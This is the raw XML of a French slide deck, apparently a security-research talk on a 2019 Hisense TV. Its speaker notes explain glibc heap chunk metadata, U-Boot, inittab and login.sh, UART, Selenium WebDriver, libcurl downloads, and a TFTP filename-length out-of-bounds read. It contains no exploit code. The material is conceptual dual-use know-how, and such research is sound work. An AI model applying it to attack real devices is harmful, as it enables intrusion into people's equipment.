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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId59"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId60"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="267" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="263" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="276" r:id="rId16"/>
    <p:sldId id="277" r:id="rId17"/>
    <p:sldId id="278" r:id="rId18"/>
    <p:sldId id="264" r:id="rId19"/>
    <p:sldId id="265" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="312" r:id="rId23"/>
    <p:sldId id="279" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="266" r:id="rId27"/>
    <p:sldId id="311" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="287" r:id="rId32"/>
    <p:sldId id="288" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="291" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="295" r:id="rId39"/>
    <p:sldId id="296" r:id="rId40"/>
    <p:sldId id="297" r:id="rId41"/>
    <p:sldId id="298" r:id="rId42"/>
    <p:sldId id="299" r:id="rId43"/>
    <p:sldId id="300" r:id="rId44"/>
    <p:sldId id="313" r:id="rId45"/>
    <p:sldId id="314" r:id="rId46"/>
    <p:sldId id="301" r:id="rId47"/>
    <p:sldId id="302" r:id="rId48"/>
    <p:sldId id="315" r:id="rId49"/>
    <p:sldId id="303" r:id="rId50"/>
    <p:sldId id="316" r:id="rId51"/>
    <p:sldId id="304" r:id="rId52"/>
    <p:sldId id="305" r:id="rId53"/>
    <p:sldId id="306" r:id="rId54"/>
    <p:sldId id="307" r:id="rId55"/>
    <p:sldId id="308" r:id="rId56"/>
    <p:sldId id="309" r:id="rId57"/>
    <p:sldId id="310" r:id="rId58"/>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8">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="244">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" orient="horz" pos="1646">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="367">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="284">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="479">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" pos="2880">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="243">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="5530">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="322">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="126">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="940">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="672">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" pos="405">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="4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8" autoAdjust="0"/>
    <p:restoredTop sz="82709" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="1242" y="96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3008"/>
        <p:guide orient="horz" pos="244"/>
        <p:guide orient="horz" pos="1646"/>
        <p:guide orient="horz" pos="367"/>
        <p:guide orient="horz" pos="284"/>
        <p:guide orient="horz" pos="479"/>
        <p:guide pos="2880"/>
        <p:guide pos="243"/>
        <p:guide pos="5530"/>
        <p:guide pos="322"/>
        <p:guide orient="horz" pos="126"/>
        <p:guide orient="horz" pos="940"/>
        <p:guide orient="horz" pos="672"/>
        <p:guide pos="405"/>
        <p:guide pos="46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45" d="100"/>
          <a:sy n="145" d="100"/>
        </p:scale>
        <p:origin x="4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B92EF51-4825-DE4D-AACA-8EB141DD3B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3F68AED0-4495-8547-B7F9-B4BC969DE8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9E27A95-E3F9-084B-B66D-7466E9197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2BC712-7AA8-864B-8435-EB8E203C15F2}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé de la date 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF5A02B6-84A7-BD48-AF52-DDED8BBF67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B6EA5B-3DE0-F748-9893-157B68DF25A6}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="909070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0B20A-0AA5-2945-AA7D-8BE54332E5F9}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>05/11/2023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6C54F-92F4-554A-B14A-D2A3BB8AE960}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1000795345"/>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TV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Hisense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> acheté fin 2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Date de production 25/10/2019</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578134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3615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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si le bit est à 1, alors le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est sur zone alloué avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, soit la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> d’un thread</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si le bit est à 0, alors le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> proviens de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> principale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>M:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> a été alloué avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>mmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et ne fait pas parti de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>P:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si le bit est a 0, alors le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> précédent est libre.  Cela signifie que lorsque ce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est libéré, il peut être joint en toute sécurité au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> précédent pour créer un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libre beaucoup plus grand.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: pointeur vers le prochain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> libre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : lorsque le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> est libre ce champs contient la même valeur que size. Cela permet à la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> de détecter des corruptions de mémoire, notamment lorsqu’elle tente de fusionner deux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71545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4674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U-boot c’est un bootloader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> utilisé pour les système embarqué</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65754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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>inittab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : décrit l’ensemble des processus qui doivent être lancés au démarrage du système</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>login.sh : le nom attire l’œil </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208770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UART : Emetteur récepteur asynchrone universel, ce terme défini un protocole dédié à l’échange de données série entre deux appareils.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données UART sont émises sous forme de trame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bit de parité pour la détection d’erreur:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Parité paire, ce bit est réglé de manière que le nombre total de 1 dans la trame sera pair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Parité impaire, ce bit est réglé de manière que le nombre total de 1 dans la trame sera impair</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>L’UART est asynchrone, pas d’horloge, les deux extrémités doivent émettre à la même vitesse prédéfinie, afin d’avoir la même durée de bit.</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3158285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t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WebDriver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> permets de piloter un navigateur de manière native, comme le ferait un utilisateur, soit localement, soit sur une machine distante en utilisant le serveur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Selenium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cela permet d’automatiser les tests sur le navigateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296707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recherche tout les objets globaux Javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8132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downloadAsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> utilise la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>libcurl</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352892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TFTP ( Trivial File Transfert Protocol ) est un protocole simplifié de transfert de fichiers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Contrairement à FTP il ne gère le listage de fichiers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Lorsqu’on demande un fichier en TFTP, le client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>envoye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> un paquet contenant le nom du fichier. Ce paquet fait au maximum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>blksize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le nombre d’octets est calculé en fonction de la taille du nom de fichier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) qui peut être plus grande que la taille du paquets, il y’a out of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161442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nd tit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03287" y="1798799"/>
            <a:ext cx="7875587" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr b="1" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Zone de titre de niveau 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du numéro de diapositive 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F08268AD-BA7B-45E4-B39E-FA6C30A91D07}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>05/11/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271463" y="114087"/>
            <a:ext cx="799570" cy="22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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Espace réservé du texte 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903287" y="2984495"/>
            <a:ext cx="6665301" cy="777454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="342900" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Zone de titre de niveau 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Espace réservé pour une image  12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027113" y="3761949"/>
            <a:ext cx="6542087" cy="1013251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8337F0A0-96FD-5742-9FEB-366AAEFAE509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108178" y="3611908"/>
            <a:ext cx="184731" cy="30008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271907384"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2958">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
